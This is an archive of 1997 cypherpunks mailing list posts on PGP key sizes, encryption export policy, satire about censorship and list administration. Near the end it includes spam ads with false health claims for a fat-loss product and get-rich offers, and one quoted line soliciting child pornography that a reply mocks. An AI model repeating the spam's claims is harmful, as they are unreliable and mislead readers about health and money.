OS/2 PGP 2.6.3a at: http://www.amaranth.com/~whgiii/pgpmr2.html                        
- ---------------------------------------------------------------

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3a
Charset: cp850
Comment: Registered_User_E-Secure_v1.1b1_ES000000

iQCVAwUBNADBHI9Co1n+aLhhAQGiLwP+Jrg2UW92mmj8WDYwadnk5LixmOInSFOa
bgJNuRe3gNNTA6WiN3BOqgDPXpUZS3um2uNWAdpHenVbt7vqM6YDhV6Igephyrer
W+1pUxftCoqQAsPcqoJCyMlLy513dv1NJin4phPO4zDJi9jXcUFJsCUFNKFpJ5TZ
atopyx/H1LU=
=udz1
-----END PGP SIGNATURE-----






From anon at anon.efga.org  Sun Aug 24 17:29:55 1997
From: anon at anon.efga.org (Anonymous)
Date: Mon, 25 Aug 1997 08:29:55 +0800
Subject: PGP5i supports RSA keys?
In-Reply-To: <19970817123643.13713.qmail@hotmail.com>
Message-ID: 



Bill Stewart  writes:

> ...
> but there's also really no need for keys longer than 2048 bits unless
> some radical algorithmic breakthrough happens.  (Computer hardware 
> breakthroughs aren't relevant; the exponential behaviour of the
> algorithms mean that a few extra bits makes any device that fits
> on the planet still too small.)  1024 bits is probably enough,
> but maybe not, depending on how long you need to keep something secret
> and how much technology improves doing your lifetime.  

Sorry, but computer hardware performance is increasing exponentially,
but the difficulty of factoring is subexponential in the length of the
number.






From frogfarm at yakko.cs.wmich.edu  Sun Aug 24 17:30:19 1997
From: frogfarm at yakko.cs.wmich.edu (Damaged Justice)
Date: Mon, 25 Aug 1997 08:30:19 +0800
Subject: Why Not to use PGP 5.0
In-Reply-To: <199708250009.UAA02186@yakko.cs.wmich.edu>
Message-ID: <19970824203231.19309@yakko.cs.wmich.edu>



An entity calling itself William H. Geiger III allegedly wrote:
> >http://www.shub-internet.org/why_not_pgp_5.html
> 
> Well I went to this web page and once again nothing but FUD.
>
> Oh well better luck next time frogfarm,

I think the best luck I could have would be if some kind soul were to
explain in a little detail why the claims on the above page are FUD, for
those of us not as technically advanced as the hardcoders.

I don't write 'em; I just forwards 'em...

--
Write your representatives and complain. Demand that they institute the death
penalty for all crimes, including jaywalking, tearing the tags off mattresses
and "thinking about possibly contemplating an action which may be considered a
crime at some point in the future."  ['TruthMonger', on the cypherpunks list] 






From vznuri at netcom.com  Sun Aug 24 18:23:49 1997
From: vznuri at netcom.com (Vladimir Z. Nuri)
Date: Mon, 25 Aug 1997 09:23:49 +0800
Subject: gephardt slams crypto regs
Message-ID: <199708250116.SAA22371@netcom13.netcom.com>




------- Forwarded Message

Date: Sat, 23 Aug 1997 00:57:05 -0700
From: "J. Orlin Grabbe" 
Subject: [Fwd: Encryption is vital to the Net BY RICHARD A. GEPHARDT]


- ->  SearchNet's   SNETNEWS   Mailing List

Path: news.alt.net!news1.alt.net!news.maxwell.syr.edu!news-peer.sprintlink.net!news-pull.sprintlink.net!news-in-east.sprintlink.net!news.sprintlink.net!Sprint!198.240.78.6!news.us.net!not-for-mail
From: softwar at us.net (SOFTWAR)
Newsgroups: talk.politics.crypto,alt.wired,alt.politics.democrats.d,alt.politics.usa.republican,alt.politics.clinton,alt.president.clinton,talk.politics.misc,alt.politics.usa.misc,alt.politics.usa.congress,alt.whitehous.gov,alt.politics.org.cia,alt.politics.org.nsa,alt.politics.org.fbi
Subject: Encryption is vital to the Net BY RICHARD A. GEPHARDT
Date: Fri, 22 Aug 1997 22:22:02 GMT
Organization: SOFTWAR
Message-ID: <5tkhs3$fun$1 at news.us.net>
NNTP-Posting-Host: host46.richmond.us.net
X-Newsreader: Forte Free Agent 1.0.82
Xref: news.alt.net talk.politics.crypto:17311 alt.wired:55794 alt.politics.democrats.d:270387 alt.politics.usa.republican:490233 alt.politics.clinton:344303 alt.president.clinton:129822 talk.politics.misc:571350 alt.politics.usa.misc:167063 alt.politics.usa.congress:129082 alt.politics.org.cia:23221 alt.politics.org.nsa:9829 alt.politics.org.fbi:12348

Encryption is vital to the Net

 BY RICHARD A. GEPHARDT

 THE Clinton administration's recent call for a ``non-regulatory,
market-oriented''  approach to promoting Internet commerce includes
many constructive initiatives.   However, if we are to realize the
full potential of the Internet, we must also end the  outdated
restrictions on U.S. exports of encryption products.

 Encryption, which encodes electronic messages so that only a
recipient with the  ability to decode the message can read it, is
vital to the future of Internet  commerce. It prevents crime by
keeping hackers from reading your e-mail or  stooling your credit card
numbers. It helps companies protect trade secrets. As  more
information flows over the open networks that constitute the Internet,
people  increasingly need encryption to keep their information secure.

 Because encryption is not restricted domestically, you would think
American  companies would be global leaders in world markets. But
often they aren't allowed  to compete. Fearing the availability of
encryption abroad could make it more  difficult for the U.S.
government to intercept the communications of criminals and
 gather intelligence, the current and past Administrations have chosen
to maintain  strict export controls on encryption. The level of
encryption U.S. companies are permitted to export is now so weak that
a college hacker can break it in less than  four hours.

 If export controls could keep encryption from criminals, controls
would make  sense. But U.S. self-restraint has simply encouraged
foreign producers of strong  encryption, who are not covered by export
limits, to fill the vacuum. Hundreds of  strong encryption products,
many developed in countries like Canada, Ireland, Germany and Russia,
are increasingly available abroad. And as foreign competitors
 use their advantage in encryption to win more high-tech sales, we
lose jobs.

 The National Research Council's blue-ribbon panel on encryption
policy recently  warned that ``foreign competition could emerge at a
level significant enough to  damage the present U.S. world
leadership'' in the software industry. Such damage could jeopardize
hundreds of thousands of high-paying jobs. It could also  undermine
our national security, according to the Council, by making it harder
for  the U.S. government to keep abreast of evolving encryption
technology in the  future. The Council endorsed a relaxation of export
controls in order to maintain the U.S. lead in this vital sector.

 The Administration has proposed a ``key recovery'' system to require
users to  make available to governments the ``keys''' to decode their
private communications. But giving governments worldwide ready access
to individuals' private information and to corporate secrets raises
difficult issues. Will U.S. firms operating in China be forced to
trust that government with the keys to their trade secrets? Will human
rights groups abroad, where U.S. constitutional protections do
 not apply, be forced to give authoritarian governments the keys to
their membership lists? Can we really expect criminals to give up
their keys so that they may be made available to the government?

 Key recovery won't work unless the many countries that produce
encryption adopt it. Otherwise criminals could still obtain encryption
from non-complying countries.  But countries like Germany have refused
to support key recovery. Indeed, they have a strong economic incentive
to resist. As long as the international disagreements persist and we
hog-tie our industry, their's will enjoy an advantage in world
markets.

 The National Research Council urged a balanced approach to this
problem: improve security on the Internet and prevent crime by
relaxing exports controls and allowing U.S. exporters to meet the
competition. Maintain robust controls against rogue nations. Impose
penalties for misusing encryption to commit crime.  And invest in
additional technical capabilities to help our intelligence agencies
adjust to the information age.

 Led by Members like Congresswoman Zoe Lofgren, D-San Jose, more than
250 Democrats and Republicans in the House of Representatives --
myself included -- have joined in support of the Security and Freedom
through Encryption (SAFE) bill to relax export controls and advance
many of the recommendations of the National Research Council.

 With growing support, the SAFE bill makes it clear that the Congress
will not tolerate the continued shackling of our high-tech sector. We
are willing to work with all sides to develop a consensus on a
workable, market-oriented approach that can advance our law
enforcement interests and win international acceptance.
 But we aren't willing to simply watch the current stalemate continue
and keep U.S. industry on the sidelines. It is time to move forward
and modernize our export policies for the information age.


 Rep. Richard A. Gephardt, D-Mo., is the House Democratic leader. 

 Published Thursday, August 21, 1997, in the San Jose Mercury News 





- -> Send "subscribe   snetnews " to majordomo at world.std.com
- ->  Posted by: "J. Orlin Grabbe" 


------- End of Forwarded Message






From remailer at bureau42.ml.org  Sun Aug 24 18:27:04 1997
From: remailer at bureau42.ml.org (bureau42 Anonymous Remailer)
Date: Mon, 25 Aug 1997 09:27:04 +0800
Subject: MACKERALS / Re: MIRICLES EVERYWHERE!!!
Message-ID: 



BBblue at delphi.com wrote:
> 
>  Financial Healings.

  This is actually from list forger, Robert Hettinga, who was trying
to write a post called 'Financial Dealings' when he was seized by a
fit of Platypus-Downey Syndrome.
  Originally a government-generated hereditary Trojan virus developed
by allegedly reptilian Nazis, agraphia was introduced to the cypherpunks
mailing list, becoming commonly known as Platyagraphia, as it spread
quickly throughout the list.
  By a curious penalty-stroke of fate, the Christian hordes descending
on the list as the outbreak of Platyagraphia spread, were inflected,
and the resulting inflection turned them into Christian 'whores,' at
which time Platyagraphia became uncommonly known as Platypus-Downey
Syndrome.

>   Enclose a self stamped and self addressed envelope with one dollar in it to each of the people below.
>  COME ON!   What are you going to loose?   6 WHOLE DOLLARS!  NO WAY CAN YOU POSSIBLY LOSE.

  Hettinga, once a respected member of the financial crypto community,
has been turned
into pathetic figure by Platypus-Downey Syndrome, which has aggragated
the Money Fever
that he had been successful in controlling up to this point. Now he has
been reduced
to spamming the Internet with MLM Prayer-List chain mail, in a desperate
attempt to
"Make Money La$t" at a dollar-a-pop.
  Once a secular figure known as the Father of eCa$h, Hettinga is now a
quasi-religious
Cyhperpunk Cult of One leader known as the Dollar Llama.

>  Remember to have a copy of Your favorite healing prayer to stuff in envlopes as they send you $1.00.
>  If you don't have one you may use mine.

  In his own defence, Hettinga, making a veiled reference to the "lack
of evolutionary
pressures" thread currently raging on the list, said, "I'm providing a
service to
both the Christan community and the financial eugenics movement, by
confiscating
financial munitions from those too stupid to pray without my help, one
dollar at
a time.

MackeralMonger






From tcmay at got.net  Sun Aug 24 19:18:33 1997
From: tcmay at got.net (Tim May)
Date: Mon, 25 Aug 1997 10:18:33 +0800
Subject: Prior Restraint on Publishers
Message-ID: 




I used to think things like this would be quickly declared
unconstitutional, but not any longer. The New Order is making things like
this all too predictable. I just hope Adam Shostack does not get in even
more trouble for speaking out.

--Winston Smith


>
>From the New Yerk Tomes cybertimes:
>
>Proposed U.S. Rules Would Place Prior Restraint on Publishers
>
>By PETER MAYNOR
>
>Under a proposed set of rules being circulated by the Commerce
>Department, the Clinton Administration is considering regulating
>Web servers that allow publishing of political tracts and other forms
>of information. Among the sites that would be affected are those now
>operated by organizations like Planned Parenthood, the National Rifle
>Association, and Citizens for the Destruction of Washington, all of
>which distribute publications over the Web. Under the proposed rules,
>access to such sites would be more tightly controlled or could disappear
>altogether in the future.
>
>The requirement for Federal approval of a Web server, however, is
>buried inside the densely written, virtually impenetrable document,
>and the change is not even noted in the executive summary at the
>beginning. The new regulation would require that anyone setting up
>a Web server offering published materials seek an "advisory opinion"
>from the Bureau of Thoughtcrime Affairs.
>
>The opinions carry no weight in court and only serve as an indication
>of the agency's view on the matter at a given moment. A company
>could later be prosecuted for publishing materials despite receiving
>permission in an advisory opinion, although the existence of the
>opinion should offer some emotional support with the court. Failure to
>seek >permission will likely be interpreted by courts as evidence of
>criminal tendencies.
>
>The purpose of the rule is to force the Web server to take all prudent steps
>to ensure that publications do not violate the laws of the United States.
>
>The proposed regulations do not set out any hard and fast guidelines
>for an organization to meet.  The new regulations hwould effectively force
>>organzations to shut down their Web servers until the Ministry of Truth
>could rule on the material -- a process that can take several months.
>
>Brewart Staker, a former general counsel for the Ministry of Truth who now
>>practices at the Washington law firm Goldsgtein, Blair & Orwell, said
>that the >difficulty the regulators face is that the regulations must
>adapt to a quickly >changing Internet environment.
>
>"They're saying 'Here's the basic standard. Show us what you're trying to
>do. If you're doing what we feel is a good faith effort, then we'll
>approve it,'" >Staker said. "They don't quite say that, but I suspect
>that's what's going on."
>
>To draw an analogy, he compared the action to a hand check in basketball, a
>move by which a defensive player warns someone with a ball that they're
>there by touching them. "Think of this as just as a friendly >warning from
>Big >Brother, telling you he loves you and is looking out for your best
>interests."
>
>Adam Shostack, a Boston-based Cypherpunk facing imprisonment for
>belonging to a subversive organization,  said that the current rules were
>already making it difficult for his clients to publish their ideas. The
>new >regulations, Shostack predicted, will just make matters worse.
>
>"We've never needed the permission of the government to publish
>anything in this country," Shostack said. "I don't see where their
>legal authority comes from."
>







From nobody at REPLAY.COM  Sun Aug 24 19:21:00 1997
From: nobody at REPLAY.COM (Anonymous)
Date: Mon, 25 Aug 1997 10:21:00 +0800
Subject: Glut of Doctors? (Oh Horror, Oh Horror!) / Re: index.html
Message-ID: <199708250158.DAA05186@basement.replay.com>



Jim Choate wrote:
>    CNN
>               REPORT: U.S. TO PAY HOSPITALS NOT TO TRAIN DOCTORS
>       Doctor graphic August 24, 1997

>      WASHINGTON (CNN) -- In an effort to reduce a glut of physicians in
>      the United States, the federal government will pay training
>      hospitals hundreds of millions of dollars not to train doctors, The
>      Washington Post reported Sunday.

  Thus protecting the citizens from the horrible spectre of reasonably
priced health care. Sick people around the nation must be applauding 
this government effort.
 
>      Medicare underwrites residency training programs heavily. Taxpayers
>      spend $7 billion a year on the training, with each resident
>      translating into an average subsidy of $100,000 a year.

  I don't suppose that simply "dropping" the subsidy would have the
same result of reducing the number of doctors, would it?
  (Hello! Is anybody home...?)

>      The payments are the government's first effort to constrict the
>      pipeline of people entering the medical profession, and one of the
>      few times the federal government has used subsidies as leverage to
>      shrink a particular work force.

  At the same time that the baby boom is turning into a geriatric boom
which will increase the need for physicians.
  Sounds like the makings a future "HEALTH CARE CRISIS!!!!" which the
government will have to address with new laws and a dramatic increase
in government funding for subsidized residency training.

  Thank God that the government has had the foresight to increasingly
arm a variety of government agencies so that they can step in to halt
the old, sick sheeple from rushing the medical centers.

>      But the agreement drew fire from teaching hospitals in other areas
>      of the country who were cutting their residency rolls voluntarily
>      and absorbing the cost of the lost subsidies without federal
>      assistance.

  Oh, you mean like is regularly done in the "real" world? Is it "legal"
to do that without government assistance?
 
>      Others wondered whether it was necessary. The number of doctors
>      training to become specialists in some fields has declined
>      dramatically despite the subsidy program, the Post article said, due
>      to well-publicized warnings that jobs for specialists were only
>      available in less populated areas.

  Oh Horror, Oh Horror!
  Reasonably priced health care, and physicians forced to endure the
indignity of providing medical services to people in areas free of
big-city smog.
  Better to heavily arm the big-city government agents to thwart the
threat of all of those country bumpkins getting past the road-block
identity checks and attempting to access the dwindling number of
big-city physicians.

  Jim, did you make this post up? Are you a forger/spoofer? This post
is so typical of government insanity that it seems like a National
Lampoon parody.

TruthMonger






From feanor at nym.alias.net  Sun Aug 24 19:32:39 1997
From: feanor at nym.alias.net (Feanor)
Date: Mon, 25 Aug 1997 10:32:39 +0800
Subject: Child Porn
Message-ID: <19970825021444.13392.qmail@nym.alias.net>



On Aug 24, 13:00, XAVIER243 at aol.com wrote:
} Subject: Child Porn
> Got any info or sites 4 me???
> 
}-- End of excerpt from XAVIER243 at aol.com

Shouldn't his user-id be '4thHorseman at aol.com'? :-)

BTW, does anyone have a good writeup on the 4 horsemen of the infocalypse
concept?




s






From adam at homeport.org  Sun Aug 24 19:38:39 1997
From: adam at homeport.org (Adam Shostack)
Date: Mon, 25 Aug 1997 10:38:39 +0800
Subject: Prior Restraint on Publishers
In-Reply-To: 
Message-ID: <199708250221.WAA14300@homeport.org>



Thanks.  :)

Adam



The Ministry of Truth's archives tell us that Winston Smith wrote:

| I used to think things like this would be quickly declared
| unconstitutional, but not any longer. The New Order is making things like
| this all too predictable. I just hope Adam Shostack does not get in even
| more trouble for speaking out.
| 
| --Winston Smith


-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume







From declan at pathfinder.com  Sun Aug 24 19:46:13 1997
From: declan at pathfinder.com (Declan McCullagh)
Date: Mon, 25 Aug 1997 10:46:13 +0800
Subject: Spam-killing PGP5/ecash postage plugin Was Re: Remailer    chaining  plugin for Eudora
In-Reply-To: <3.0.3.32.19970822090126.009e1390@localhost>
Message-ID: 



(I'm stopping in during my vacation...)

On Fri, 22 Aug 1997, Mike wrote:
> If it's $.02 to send a mail to 10000 cypherpunks, then spammers won't
> hesitate to send it. If it's $.02 * 10000 ($200) then only rich people
> (like tcmay) will post here. The only solution I see is moderation and
> censorship, and that can be (and has been) done without e-postage.
> 
> Exactly how do you think that e-postage would decrease spam on mailing
> lists?

That is a simplistic and ineffective way to implement an e-postage fix. A
better way would be to try a deposit, or a third-party rating system for
post quality, or a list of domains that are likely to be free from
spammers, or so on. These have been discussed here before. I even wrote
about them a year ago in Internet World. 

-Declan







From anon at anon.efga.org  Sun Aug 24 19:55:16 1997
From: anon at anon.efga.org (Anonymous)
Date: Mon, 25 Aug 1997 10:55:16 +0800
Subject: gephardt slams crypto regs
Message-ID: <3/6uKvQmj1IHrAUj6lvOGQ==@JawJaCrakR>



Vladimir Z. Nuri wrote:

> Encryption is vital to the Net
>  BY RICHARD A. GEPHARDT
>  Fearing the availability of
> encryption abroad could make it more  difficult for the U.S.
> government to intercept the communications of criminals and
> gather intelligence, the current and past Administrations have chosen
> to maintain  strict export controls on encryption.

  The above only makes sense in the case of the U.S. government
intercepting the communications of overseas criminals and in
gathering foreign intelligence.
  If encryption is indeed "munitions," then we are effectively
scaling back our contribution to the "arms race" without getting
a corresponding scaling back from "the enemy," who is proceeding
forward in the crypto arms race at a full pace.

TruthMonger







From jf_avon at citenet.net  Sun Aug 24 20:00:00 1997
From: jf_avon at citenet.net (jf_avon at citenet.net)
Date: Mon, 25 Aug 1997 11:00:00 +0800
Subject: Killfile [WAS:Re: Socio-Economic Cults]
In-Reply-To: <3.0.3.32.19970821112449.00973890@pop3.concentric.net>
Message-ID: <199708250247.WAA20350@cti06.citenet.net>



On 22 Aug 97 at 4:34, ? the Platypus {aka David For wrote:

> The way I see it is quite simple,  if these peaple where not payed off it
> is most likely that thay will turn to crime.  Other then condemming every
> single impovished person to death, this is one of the better soultions to
> a difficalt problem.

I lately decided, since there is so many interesting things to do in 
life and also, since minutes are in such a short supply, to make my 
killfile look prosperous.

Ciao

jfa






From tcmay at got.net  Sun Aug 24 20:00:11 1997
From: tcmay at got.net (Tim May)
Date: Mon, 25 Aug 1997 11:00:11 +0800
Subject: Prior Restraint on Publishers
In-Reply-To: 
Message-ID: 



At 7:21 PM -0700 8/24/97, Adam Shostack wrote:
>Thanks.  :)
>

By the way, which list address are you now subscribed to...I switched from
algebra. com to cyberpass.net, but now expect to see 2-3 hours delay before
posts appear.

(This applies to others, too. I'm getting replies to my posts, when sent
directly to me, literally hours before seeing it on the list. Someone
mentioned subscribing to toad.com, which, to tell the truth, I thought had
vanished as a list origination site months ago.)

--Tim

There's something wrong when I'm a felon under an increasing number of laws.
Only one response to the key grabbers is warranted: "Death to Tyrants!"
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay at got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1398269     | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."









From rah at shipwright.com  Sun Aug 24 20:23:16 1997
From: rah at shipwright.com (Robert Hettinga)
Date: Mon, 25 Aug 1997 11:23:16 +0800
Subject: MACKERALS / Re: MIRICLES EVERYWHERE!!!
In-Reply-To: 
Message-ID: 



At 9:14 pm -0400 on 8/24/97, MackeralMonger wrote:


>   Hettinga, once a respected member of the financial crypto community,

Since he works in neither finance, or crypto, *that's* a laugh...

> has been turned
> into pathetic figure by Platypus-Downey Syndrome, which has aggragated

Aggragated? oh, right. Agraphia.

> the Money Fever
> that he had been successful in controlling up to this point. Now he has
> been reduced
> to spamming the Internet with MLM Prayer-List chain mail, in a desperate
> attempt to
> "Make Money La$t" at a dollar-a-pop.
>   Once a secular figure known as the Father of eCa$h, Hettinga is now a
> quasi-religious
> Cyhperpunk Cult of One leader known as the Dollar Llama.

Oh, well. Just as long as you heap me with money instead of scrod, er,
scorn, and make the wolves go away from my door, what you say about me in
print doesn't bother me as long as you spell my name right -- and you
attribute my quotes, of course. :-).

Cheers,
The arrogant wit bender

(How's *that* for agraphia. Unscramble the anagram, and, for extra bonus
points, get my True (middle) Name.)

;-).

-----------------
Robert Hettinga (rah at shipwright.com), Philodox
e$, 44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'
The e$ Home Page: http://www.shipwright.com/







From dformosa at st.nepean.uws.edu.au  Sun Aug 24 20:25:58 1997
From: dformosa at st.nepean.uws.edu.au (? the platypus {aka David Formosa})
Date: Mon, 25 Aug 1997 11:25:58 +0800
Subject: heart
In-Reply-To: 
Message-ID: 



On Sat, 23 Aug 1997, Ray Arachelian wrote:

> On Sat, 23 Aug 1997, ? the Platypus {aka David Formosa} wrote:
> 
> > If we are willing to consider anyone of us to be less then human then we
> > all become less human.

[...]

> So what you are saying then is that when the scum inserts a toilet plunger
> up someone's butt you consider them less than human, therefore all of
> humanity becomes less than human including the plunging scum, therefore
> he himself is less than human...  

Ok I'll take this slowly

1) All of humanity is equaliy human

2) If someone is made less then human then we all become less human by
that amount

For esample if Alice, Bob and Paul all have say 10 units of humanity.  Now
Paul shoves a plunger up Bobs datehole,  we could say that Paul should
have 5 units of humanity.  By rule one every body else is now also 5
units.

As you can planly see assining humanitiy and inhumanity is a pointless
esasize.

Please excuse my spelling as I suffer from agraphia see the url in my header. 
Never trust a country with more peaple then sheep. Buy easter bilbies.
Save the ABC Is $0.08 per day too much to pay?   ex-net.scum and proud
I'm sorry but I just don't consider 'because its yucky' a convincing argument






From anon at anon.efga.org  Sun Aug 24 21:30:54 1997
From: anon at anon.efga.org (Anonymous)
Date: Mon, 25 Aug 1997 12:30:54 +0800
Subject: List Subscriptions / Re: Prior Restraint on Publishers
Message-ID: 



Tim May wrote:
> By the way, which list address are you now subscribed to...I switched from
> algebra. com to cyberpass.net, but now expect to see 2-3 hours delay before
> posts appear.
> 
> (This applies to others, too. I'm getting replies to my posts, when sent
> directly to me, literally hours before seeing it on the list. Someone
> mentioned subscribing to toad.com, which, to tell the truth, I thought had
> vanished as a list origination site months ago.)

If you subscribe to cypherpunks-unedited at toad.com you will get almost
immediate receipt of toad.com posts much of the day. Algebra.com is
generally only a short time lag behind, although this varies (and you
get duplicates of the toad.com posts).
The advantage of toad.com is that it gives you feedback as to the
time-lag of the distributed lists. The advantages of the distributed
lists is that you can change among them if one is temporarily having
problems.







From nobody at REPLAY.COM  Sun Aug 24 21:40:45 1997
From: nobody at REPLAY.COM (Anonymous)
Date: Mon, 25 Aug 1997 12:40:45 +0800
Subject: Are we 'Safe' yet?
Message-ID: <199708250426.GAA20771@basement.replay.com>



  Why does it always seem that when my supply of Prozac is dangerously
low, the people on the cypherpunks list who pay attention to what is
happening in the outside world decide to deluge the list with a variety
of posts reminding me how many reasons I have to be depressed about the
creeping tyranny and corresponding usurpment of human rights that is
threatening my right to the pursuit of drug-induced happiness?
  Even more depressing is the realization that I am a cloistered type
of individual who has little contact with the outside world, and that
this probably indicates that I am only seeing the tip of the iceberg
in terms of the atrocities being commited in the name of government.

  Aren't we safe, yet?
  With the thousands of laws that have been generated for our protection
over the last few years, shouldn't we be *more* safe now, rather than
*less* safe?
  Since our safety seems to depend on the erosion of our Constitutional
rights, could the problem be that our rights aren't being eroded *fast*
enough? Should we be pressing the government for immediate suspension
of *all* of our Constitutional rights, so that we can achieve total
safety *immediately*?
  Or should I go hide out at my family's cabin at Ruby Ridge until the
government has finally made the rest of the world safe for me?

A CypherPunk Enquirer subscriber
Oppressed Minds Want To Know






From ynter at spica.net  Mon Aug 25 12:53:29 1997
From: ynter at spica.net (ynter at spica.net)
Date: Mon, 25 Aug 1997 12:53:29 -0700 (PDT)
Subject: GET THE MOST FROM OUR SOFTWARE....
Message-ID: <>


                 UNLIMITED REVENUE WITH OUR SOFTWARE
   OVER 3000 PEOPLES LIKE YOU ALREADY MAKE A NICE LIVING
,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, 
IF YOU WNAT TO BE REMOVE FROM our recipient list don't hit REPLY. 
Just send any message to: 
,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,

4000 new productS? Start a new business or ad some new products to your existing line..
40,000 names of manufacturers and wholesalers from places like "Taiwan ,Korea, Malaysia, JAPAN" 
and other country around the world. Products you can buy so low, you can make a fortune reselling to
wholesalers or retailers 

$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
OR START A NEW BUSINESS WITH EVERYTHING READY TO OPERATE
INCLUDING YOUR OWN WEB PAGE ON A SECURE SERVER..
                       ---------------------------------------------------------------------

 You can download a demo disk directly on the site.and get started in the same day .
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
We are very sorry if this NOTICE reach YOU by error.
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$






From ynter at spica.net  Mon Aug 25 12:53:29 1997
From: ynter at spica.net (ynter at spica.net)
Date: Mon, 25 Aug 1997 12:53:29 -0700 (PDT)
Subject: GET THE MOST FROM OUR SOFTWARE....
Message-ID: <>


                 UNLIMITED REVENUE WITH OUR SOFTWARE
   OVER 3000 PEOPLES LIKE YOU ALREADY MAKE A NICE LIVING
,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, 
IF YOU WNAT TO BE REMOVE FROM our recipient list don't hit REPLY. 
Just send any message to: 
,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,

4000 new productS? Start a new business or ad some new products to your existing line..
40,000 names of manufacturers and wholesalers from places like "Taiwan ,Korea, Malaysia, JAPAN" 
and other country around the world. Products you can buy so low, you can make a fortune reselling to
wholesalers or retailers 

$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
OR START A NEW BUSINESS WITH EVERYTHING READY TO OPERATE
INCLUDING YOUR OWN WEB PAGE ON A SECURE SERVER..
                       ---------------------------------------------------------------------

 You can download a demo disk directly on the site.and get started in the same day .
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
We are very sorry if this NOTICE reach YOU by error.
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$






From feanor at nym.alias.net  Sun Aug 24 21:56:01 1997
From: feanor at nym.alias.net (Feanor)
Date: Mon, 25 Aug 1997 12:56:01 +0800
Subject: PGP5i supports RSA keys?
Message-ID: <19970825043336.28527.qmail@nym.alias.net>



On Aug 24, 21:25, Anonymous wrote:
} Subject: Re: PGP5i supports RSA keys?
> Bill Stewart  writes:
> 
> > ...
> > but there's also really no need for keys longer than 2048 bits unless
> > some radical algorithmic breakthrough happens.  (Computer hardware 
> > breakthroughs aren't relevant; the exponential behaviour of the
> > algorithms mean that a few extra bits makes any device that fits
> > on the planet still too small.)  1024 bits is probably enough,
> > but maybe not, depending on how long you need to keep something secret
> > and how much technology improves doing your lifetime.  
> 
> Sorry, but computer hardware performance is increasing exponentially,
> but the difficulty of factoring is subexponential in the length of the
> number.

TWAK!

Barring a _severe_ breakthrough in the entire nature of computing, you still
need at least 1 atom to store one bit of information.  It would take more
computing power than all the atoms in the world, with the ability to store 1 bit
on a atom and other dazzling feats of miniaturization, to crack a 2048 bit key
barring algorithmic breakthrough.

I'm sorry, but barring the severe breakthrough mentioned, Moore's Law will break
when we are storing single atoms as bits.  Or perhaps single electrons (spin,
but how the hell do you hold them in place for reading??), but the point still
stands.  Quantum computing might fill the void, but then, quantum computing
might make all Crypto thus far irrelevant anyways.







From frantz at netcom.com  Sun Aug 24 21:57:08 1997
From: frantz at netcom.com (Bill Frantz)
Date: Mon, 25 Aug 1997 12:57:08 +0800
Subject: lack of evolutionary pressures
In-Reply-To: 
Message-ID: 



At 11:47 AM -0700 8/24/97, Adam Back wrote:
>There seems to be an observable difference in business acumen between
>races .. of course this could easily be explained by their society and
>customs.

Francis Fukuyama, in his book "Trust" argues that culture is the
determining factor here.  I highly recommend the book.


-------------------------------------------------------------------------
Bill Frantz       | The Internet was designed  | Periwinkle -- Consulting
(408)356-8506     | to protect the free world  | 16345 Englewood Ave.
frantz at netcom.com | from hostile governments.  | Los Gatos, CA 95032, USA







From 18205549 at aol.com  Mon Aug 25 12:57:59 1997
From: 18205549 at aol.com (18205549 at aol.com)
Date: Mon, 25 Aug 1997 12:57:59 -0700 (PDT)
Subject: Do You Like What You See In The Mirror ?
Message-ID: <>


                                 DO YOU LIKE WHAT YOU SEE
                                        IN THE MIRROR?

                                HAVE THINGS GONE SOUTH?
                               DO YOU HAVE SAGGING SKIN?
                                IS GRAVITY TAKING IT'S TOLL?

                       INTRODUCING

                                  CALORAD(R)

 Now available in the U.S. for the first time!
 It Literally Melts Fat and Rebuilds Connective
 Tissue WHILE YOU SLEEP!  NO KIDDING!!

 10 Year Proven Track Record - 86% Success Rate
 Medical Test Results are coming in from all over the Country
 Health Practitioners are endorsing this product
 by the thousands!

                               Cholestrol Levels are down!
             Triglycerides down!                       Blood Pressure down!
                                          Pain is leaving!

 Muscle is rebuilding while bodies are RESHAPING!
 Body Builders, Athletes, World Champions and
 Professional Trainers are endorsing this product!
 INCHES AND WEIGHT MELT OFF WHILE YOU SLEEP!

             100% SAFE - 100% NATURAL

 Absolutely no SIDE EFFECTS, STIMULANTS OR DRUGS!
 Good for teenagers and adults alike!
 (No pregnant or lactating women)

 INCREDIBLE $$$$$$$$$ OPPORTUNITY AVAILABLE!
 Exclusive International Marketing Rights!
 England & Australia opening soon!

 My upline is ordering 52,000 bottles each week!
 We will help build your unlimited downline!  Not MLM!
 You can reduplicate yourself up to 99 times!

 Many are earning $1750+ first week! (possible up to 99x!!!)
 Company has only been officially launched since April 1997
 Unprecedented $6.1 million in 1st month!

                  Follow These $imple $teps To $uccess:
 
     For More info:
 
 E~mail Assistance  or 

           Call :
 
 941 - 923 - 8085

 ~~~~~~~~~~~~~~
 Remove Here !  Put "Remove" in Subject !












































